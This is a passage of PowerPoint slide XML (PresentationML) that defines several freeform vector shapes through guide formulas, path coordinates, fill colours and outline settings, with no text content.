                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36304" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4642" y="2532"/>
                <a:ext cx="29" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 29"/>
                  <a:gd name="T1" fmla="*/ 56 h 56"/>
                  <a:gd name="T2" fmla="*/ 10 w 29"/>
                  <a:gd name="T3" fmla="*/ 55 h 56"/>
                  <a:gd name="T4" fmla="*/ 10 w 29"/>
                  <a:gd name="T5" fmla="*/ 53 h 56"/>
                  <a:gd name="T6" fmla="*/ 3 w 29"/>
                  <a:gd name="T7" fmla="*/ 43 h 56"/>
                  <a:gd name="T8" fmla="*/ 1 w 29"/>
                  <a:gd name="T9" fmla="*/ 36 h 56"/>
                  <a:gd name="T10" fmla="*/ 0 w 29"/>
                  <a:gd name="T11" fmla="*/ 32 h 56"/>
                  <a:gd name="T12" fmla="*/ 1 w 29"/>
                  <a:gd name="T13" fmla="*/ 26 h 56"/>
                  <a:gd name="T14" fmla="*/ 5 w 29"/>
                  <a:gd name="T15" fmla="*/ 20 h 56"/>
                  <a:gd name="T16" fmla="*/ 15 w 29"/>
                  <a:gd name="T17" fmla="*/ 6 h 56"/>
                  <a:gd name="T18" fmla="*/ 17 w 29"/>
                  <a:gd name="T19" fmla="*/ 4 h 56"/>
                  <a:gd name="T20" fmla="*/ 20 w 29"/>
                  <a:gd name="T21" fmla="*/ 3 h 56"/>
                  <a:gd name="T22" fmla="*/ 21 w 29"/>
                  <a:gd name="T23" fmla="*/ 2 h 56"/>
                  <a:gd name="T24" fmla="*/ 24 w 29"/>
                  <a:gd name="T25" fmla="*/ 0 h 56"/>
                  <a:gd name="T26" fmla="*/ 25 w 29"/>
                  <a:gd name="T27" fmla="*/ 1 h 56"/>
                  <a:gd name="T28" fmla="*/ 29 w 29"/>
                  <a:gd name="T29" fmla="*/ 4 h 56"/>
                  <a:gd name="T30" fmla="*/ 27 w 29"/>
                  <a:gd name="T31" fmla="*/ 8 h 56"/>
                  <a:gd name="T32" fmla="*/ 26 w 29"/>
                  <a:gd name="T33" fmla="*/ 9 h 56"/>
                  <a:gd name="T34" fmla="*/ 27 w 29"/>
                  <a:gd name="T35" fmla="*/ 11 h 56"/>
                  <a:gd name="T36" fmla="*/ 26 w 29"/>
                  <a:gd name="T37" fmla="*/ 16 h 56"/>
                  <a:gd name="T38" fmla="*/ 25 w 29"/>
                  <a:gd name="T39" fmla="*/ 18 h 56"/>
                  <a:gd name="T40" fmla="*/ 23 w 29"/>
                  <a:gd name="T41" fmla="*/ 21 h 56"/>
                  <a:gd name="T42" fmla="*/ 23 w 29"/>
                  <a:gd name="T43" fmla="*/ 26 h 56"/>
                  <a:gd name="T44" fmla="*/ 22 w 29"/>
                  <a:gd name="T45" fmla="*/ 30 h 56"/>
                  <a:gd name="T46" fmla="*/ 20 w 29"/>
                  <a:gd name="T47" fmla="*/ 36 h 56"/>
                  <a:gd name="T48" fmla="*/ 17 w 29"/>
                  <a:gd name="T49" fmla="*/ 42 h 56"/>
                  <a:gd name="T50" fmla="*/ 14 w 29"/>
                  <a:gd name="T51" fmla="*/ 48 h 56"/>
                  <a:gd name="T52" fmla="*/ 13 w 29"/>
                  <a:gd name="T53" fmla="*/ 51 h 56"/>
                  <a:gd name="T54" fmla="*/ 13 w 29"/>
                  <a:gd name="T55" fmla="*/ 54 h 56"/>
                  <a:gd name="T56" fmla="*/ 11 w 29"/>
                  <a:gd name="T57" fmla="*/ 56 h 5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29"/>
                  <a:gd name="T88" fmla="*/ 0 h 56"/>
                  <a:gd name="T89" fmla="*/ 29 w 29"/>
                  <a:gd name="T90" fmla="*/ 56 h 5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29" h="56">
                    <a:moveTo>
                      <a:pt x="11" y="56"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36305" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4642" y="2532"/>
                <a:ext cx="29" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 29"/>
                  <a:gd name="T1" fmla="*/ 56 h 56"/>
                  <a:gd name="T2" fmla="*/ 10 w 29"/>
                  <a:gd name="T3" fmla="*/ 55 h 56"/>
                  <a:gd name="T4" fmla="*/ 10 w 29"/>
                  <a:gd name="T5" fmla="*/ 53 h 56"/>
                  <a:gd name="T6" fmla="*/ 3 w 29"/>
                  <a:gd name="T7" fmla="*/ 43 h 56"/>
                  <a:gd name="T8" fmla="*/ 1 w 29"/>
                  <a:gd name="T9" fmla="*/ 36 h 56"/>
                  <a:gd name="T10" fmla="*/ 0 w 29"/>
                  <a:gd name="T11" fmla="*/ 32 h 56"/>
                  <a:gd name="T12" fmla="*/ 1 w 29"/>
                  <a:gd name="T13" fmla="*/ 26 h 56"/>
                  <a:gd name="T14" fmla="*/ 5 w 29"/>
                  <a:gd name="T15" fmla="*/ 20 h 56"/>
                  <a:gd name="T16" fmla="*/ 15 w 29"/>
                  <a:gd name="T17" fmla="*/ 6 h 56"/>
                  <a:gd name="T18" fmla="*/ 17 w 29"/>
                  <a:gd name="T19" fmla="*/ 4 h 56"/>
                  <a:gd name="T20" fmla="*/ 20 w 29"/>
                  <a:gd name="T21" fmla="*/ 3 h 56"/>
                  <a:gd name="T22" fmla="*/ 21 w 29"/>
                  <a:gd name="T23" fmla="*/ 2 h 56"/>
                  <a:gd name="T24" fmla="*/ 24 w 29"/>
                  <a:gd name="T25" fmla="*/ 0 h 56"/>
                  <a:gd name="T26" fmla="*/ 25 w 29"/>
                  <a:gd name="T27" fmla="*/ 1 h 56"/>
                  <a:gd name="T28" fmla="*/ 29 w 29"/>
                  <a:gd name="T29" fmla="*/ 4 h 56"/>
                  <a:gd name="T30" fmla="*/ 27 w 29"/>
                  <a:gd name="T31" fmla="*/ 8 h 56"/>
                  <a:gd name="T32" fmla="*/ 26 w 29"/>
                  <a:gd name="T33" fmla="*/ 9 h 56"/>
                  <a:gd name="T34" fmla="*/ 27 w 29"/>
                  <a:gd name="T35" fmla="*/ 11 h 56"/>
                  <a:gd name="T36" fmla="*/ 26 w 29"/>
                  <a:gd name="T37" fmla="*/ 16 h 56"/>
                  <a:gd name="T38" fmla="*/ 25 w 29"/>
                  <a:gd name="T39" fmla="*/ 18 h 56"/>
                  <a:gd name="T40" fmla="*/ 23 w 29"/>
                  <a:gd name="T41" fmla="*/ 21 h 56"/>
                  <a:gd name="T42" fmla="*/ 23 w 29"/>
                  <a:gd name="T43" fmla="*/ 26 h 56"/>
                  <a:gd name="T44" fmla="*/ 22 w 29"/>
                  <a:gd name="T45" fmla="*/ 30 h 56"/>
                  <a:gd name="T46" fmla="*/ 20 w 29"/>
                  <a:gd name="T47" fmla="*/ 36 h 56"/>
                  <a:gd name="T48" fmla="*/ 17 w 29"/>
                  <a:gd name="T49" fmla="*/ 42 h 56"/>
                  <a:gd name="T50" fmla="*/ 14 w 29"/>
                  <a:gd name="T51" fmla="*/ 48 h 56"/>
                  <a:gd name="T52" fmla="*/ 13 w 29"/>
                  <a:gd name="T53" fmla="*/ 51 h 56"/>
                  <a:gd name="T54" fmla="*/ 13 w 29"/>
                  <a:gd name="T55" fmla="*/ 54 h 56"/>
                  <a:gd name="T56" fmla="*/ 11 w 29"/>
                  <a:gd name="T57" fmla="*/ 56 h 5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29"/>
                  <a:gd name="T88" fmla="*/ 0 h 56"/>
                  <a:gd name="T89" fmla="*/ 29 w 29"/>
                  <a:gd name="T90" fmla="*/ 56 h 5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29" h="56">
                    <a:moveTo>
                      <a:pt x="11" y="56"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36306" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4738" y="2281"/>
                <a:ext cx="55" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 55"/>
                  <a:gd name="T1" fmla="*/ 18 h 84"/>
                  <a:gd name="T2" fmla="*/ 7 w 55"/>
                  <a:gd name="T3" fmla="*/ 16 h 84"/>
                  <a:gd name="T4" fmla="*/ 9 w 55"/>
                  <a:gd name="T5" fmla="*/ 14 h 84"/>
                  <a:gd name="T6" fmla="*/ 14 w 55"/>
                  <a:gd name="T7" fmla="*/ 7 h 84"/>
                  <a:gd name="T8" fmla="*/ 16 w 55"/>
                  <a:gd name="T9" fmla="*/ 6 h 84"/>
                  <a:gd name="T10" fmla="*/ 20 w 55"/>
                  <a:gd name="T11" fmla="*/ 6 h 84"/>
                  <a:gd name="T12" fmla="*/ 25 w 55"/>
                  <a:gd name="T13" fmla="*/ 7 h 84"/>
                  <a:gd name="T14" fmla="*/ 28 w 55"/>
                  <a:gd name="T15" fmla="*/ 7 h 84"/>
                  <a:gd name="T16" fmla="*/ 30 w 55"/>
                  <a:gd name="T17" fmla="*/ 6 h 84"/>
                  <a:gd name="T18" fmla="*/ 34 w 55"/>
                  <a:gd name="T19" fmla="*/ 0 h 84"/>
                  <a:gd name="T20" fmla="*/ 39 w 55"/>
                  <a:gd name="T21" fmla="*/ 6 h 84"/>
                  <a:gd name="T22" fmla="*/ 48 w 55"/>
                  <a:gd name="T23" fmla="*/ 20 h 84"/>
                  <a:gd name="T24" fmla="*/ 50 w 55"/>
                  <a:gd name="T25" fmla="*/ 25 h 84"/>
                  <a:gd name="T26" fmla="*/ 52 w 55"/>
                  <a:gd name="T27" fmla="*/ 31 h 84"/>
                  <a:gd name="T28" fmla="*/ 52 w 55"/>
                  <a:gd name="T29" fmla="*/ 38 h 84"/>
                  <a:gd name="T30" fmla="*/ 52 w 55"/>
                  <a:gd name="T31" fmla="*/ 46 h 84"/>
                  <a:gd name="T32" fmla="*/ 51 w 55"/>
                  <a:gd name="T33" fmla="*/ 52 h 84"/>
                  <a:gd name="T34" fmla="*/ 52 w 55"/>
                  <a:gd name="T35" fmla="*/ 53 h 84"/>
                  <a:gd name="T36" fmla="*/ 55 w 55"/>
                  <a:gd name="T37" fmla="*/ 52 h 84"/>
                  <a:gd name="T38" fmla="*/ 55 w 55"/>
                  <a:gd name="T39" fmla="*/ 56 h 84"/>
                  <a:gd name="T40" fmla="*/ 53 w 55"/>
                  <a:gd name="T41" fmla="*/ 60 h 84"/>
                  <a:gd name="T42" fmla="*/ 49 w 55"/>
                  <a:gd name="T43" fmla="*/ 67 h 84"/>
                  <a:gd name="T44" fmla="*/ 47 w 55"/>
                  <a:gd name="T45" fmla="*/ 70 h 84"/>
                  <a:gd name="T46" fmla="*/ 45 w 55"/>
                  <a:gd name="T47" fmla="*/ 70 h 84"/>
                  <a:gd name="T48" fmla="*/ 41 w 55"/>
                  <a:gd name="T49" fmla="*/ 68 h 84"/>
                  <a:gd name="T50" fmla="*/ 39 w 55"/>
                  <a:gd name="T51" fmla="*/ 69 h 84"/>
                  <a:gd name="T52" fmla="*/ 35 w 55"/>
                  <a:gd name="T53" fmla="*/ 74 h 84"/>
                  <a:gd name="T54" fmla="*/ 32 w 55"/>
                  <a:gd name="T55" fmla="*/ 73 h 84"/>
                  <a:gd name="T56" fmla="*/ 30 w 55"/>
                  <a:gd name="T57" fmla="*/ 71 h 84"/>
                  <a:gd name="T58" fmla="*/ 26 w 55"/>
                  <a:gd name="T59" fmla="*/ 72 h 84"/>
                  <a:gd name="T60" fmla="*/ 22 w 55"/>
                  <a:gd name="T61" fmla="*/ 74 h 84"/>
                  <a:gd name="T62" fmla="*/ 14 w 55"/>
                  <a:gd name="T63" fmla="*/ 81 h 84"/>
                  <a:gd name="T64" fmla="*/ 10 w 55"/>
                  <a:gd name="T65" fmla="*/ 82 h 84"/>
                  <a:gd name="T66" fmla="*/ 7 w 55"/>
                  <a:gd name="T67" fmla="*/ 84 h 84"/>
                  <a:gd name="T68" fmla="*/ 7 w 55"/>
                  <a:gd name="T69" fmla="*/ 79 h 84"/>
                  <a:gd name="T70" fmla="*/ 6 w 55"/>
                  <a:gd name="T71" fmla="*/ 77 h 84"/>
                  <a:gd name="T72" fmla="*/ 5 w 55"/>
                  <a:gd name="T73" fmla="*/ 70 h 84"/>
                  <a:gd name="T74" fmla="*/ 4 w 55"/>
                  <a:gd name="T75" fmla="*/ 67 h 84"/>
                  <a:gd name="T76" fmla="*/ 5 w 55"/>
                  <a:gd name="T77" fmla="*/ 63 h 84"/>
                  <a:gd name="T78" fmla="*/ 9 w 55"/>
                  <a:gd name="T79" fmla="*/ 59 h 84"/>
                  <a:gd name="T80" fmla="*/ 9 w 55"/>
                  <a:gd name="T81" fmla="*/ 56 h 84"/>
                  <a:gd name="T82" fmla="*/ 10 w 55"/>
                  <a:gd name="T83" fmla="*/ 52 h 84"/>
                  <a:gd name="T84" fmla="*/ 10 w 55"/>
                  <a:gd name="T85" fmla="*/ 51 h 84"/>
                  <a:gd name="T86" fmla="*/ 7 w 55"/>
                  <a:gd name="T87" fmla="*/ 48 h 84"/>
                  <a:gd name="T88" fmla="*/ 7 w 55"/>
                  <a:gd name="T89" fmla="*/ 46 h 84"/>
                  <a:gd name="T90" fmla="*/ 7 w 55"/>
                  <a:gd name="T91" fmla="*/ 41 h 84"/>
                  <a:gd name="T92" fmla="*/ 6 w 55"/>
                  <a:gd name="T93" fmla="*/ 38 h 84"/>
                  <a:gd name="T94" fmla="*/ 4 w 55"/>
                  <a:gd name="T95" fmla="*/ 37 h 84"/>
                  <a:gd name="T96" fmla="*/ 0 w 55"/>
                  <a:gd name="T97" fmla="*/ 37 h 84"/>
                  <a:gd name="T98" fmla="*/ 5 w 55"/>
                  <a:gd name="T99" fmla="*/ 33 h 84"/>
                  <a:gd name="T100" fmla="*/ 7 w 55"/>
                  <a:gd name="T101" fmla="*/ 32 h 84"/>
                  <a:gd name="T102" fmla="*/ 11 w 55"/>
                  <a:gd name="T103" fmla="*/ 34 h 84"/>
                  <a:gd name="T104" fmla="*/ 13 w 55"/>
                  <a:gd name="T105" fmla="*/ 32 h 84"/>
                  <a:gd name="T106" fmla="*/ 13 w 55"/>
                  <a:gd name="T107" fmla="*/ 30 h 84"/>
                  <a:gd name="T108" fmla="*/ 8 w 55"/>
                  <a:gd name="T109" fmla="*/ 22 h 84"/>
                  <a:gd name="T110" fmla="*/ 7 w 55"/>
                  <a:gd name="T111" fmla="*/ 19 h 84"/>
                  <a:gd name="T112" fmla="*/ 6 w 55"/>
                  <a:gd name="T113" fmla="*/ 18 h 84"/>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55"/>
                  <a:gd name="T172" fmla="*/ 0 h 84"/>
                  <a:gd name="T173" fmla="*/ 55 w 55"/>
                  <a:gd name="T174" fmla="*/ 84 h 84"/>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55" h="84">
                    <a:moveTo>
                      <a:pt x="6" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36307" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4738" y="2281"/>
                <a:ext cx="55" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 55"/>
                  <a:gd name="T1" fmla="*/ 18 h 84"/>
                  <a:gd name="T2" fmla="*/ 7 w 55"/>
                  <a:gd name="T3" fmla="*/ 16 h 84"/>
                  <a:gd name="T4" fmla="*/ 9 w 55"/>
                  <a:gd name="T5" fmla="*/ 14 h 84"/>
                  <a:gd name="T6" fmla="*/ 14 w 55"/>
                  <a:gd name="T7" fmla="*/ 7 h 84"/>
                  <a:gd name="T8" fmla="*/ 16 w 55"/>
                  <a:gd name="T9" fmla="*/ 6 h 84"/>
                  <a:gd name="T10" fmla="*/ 20 w 55"/>
                  <a:gd name="T11" fmla="*/ 6 h 84"/>
                  <a:gd name="T12" fmla="*/ 25 w 55"/>
                  <a:gd name="T13" fmla="*/ 7 h 84"/>
                  <a:gd name="T14" fmla="*/ 28 w 55"/>
                  <a:gd name="T15" fmla="*/ 7 h 84"/>
                  <a:gd name="T16" fmla="*/ 30 w 55"/>
                  <a:gd name="T17" fmla="*/ 6 h 84"/>
                  <a:gd name="T18" fmla="*/ 34 w 55"/>
                  <a:gd name="T19" fmla="*/ 0 h 84"/>
                  <a:gd name="T20" fmla="*/ 39 w 55"/>
                  <a:gd name="T21" fmla="*/ 6 h 84"/>
                  <a:gd name="T22" fmla="*/ 48 w 55"/>
                  <a:gd name="T23" fmla="*/ 20 h 84"/>
                  <a:gd name="T24" fmla="*/ 50 w 55"/>
                  <a:gd name="T25" fmla="*/ 25 h 84"/>
                  <a:gd name="T26" fmla="*/ 52 w 55"/>
                  <a:gd name="T27" fmla="*/ 31 h 84"/>
                  <a:gd name="T28" fmla="*/ 52 w 55"/>
                  <a:gd name="T29" fmla="*/ 38 h 84"/>
                  <a:gd name="T30" fmla="*/ 52 w 55"/>
                  <a:gd name="T31" fmla="*/ 46 h 84"/>
                  <a:gd name="T32" fmla="*/ 51 w 55"/>
                  <a:gd name="T33" fmla="*/ 52 h 84"/>
                  <a:gd name="T34" fmla="*/ 52 w 55"/>
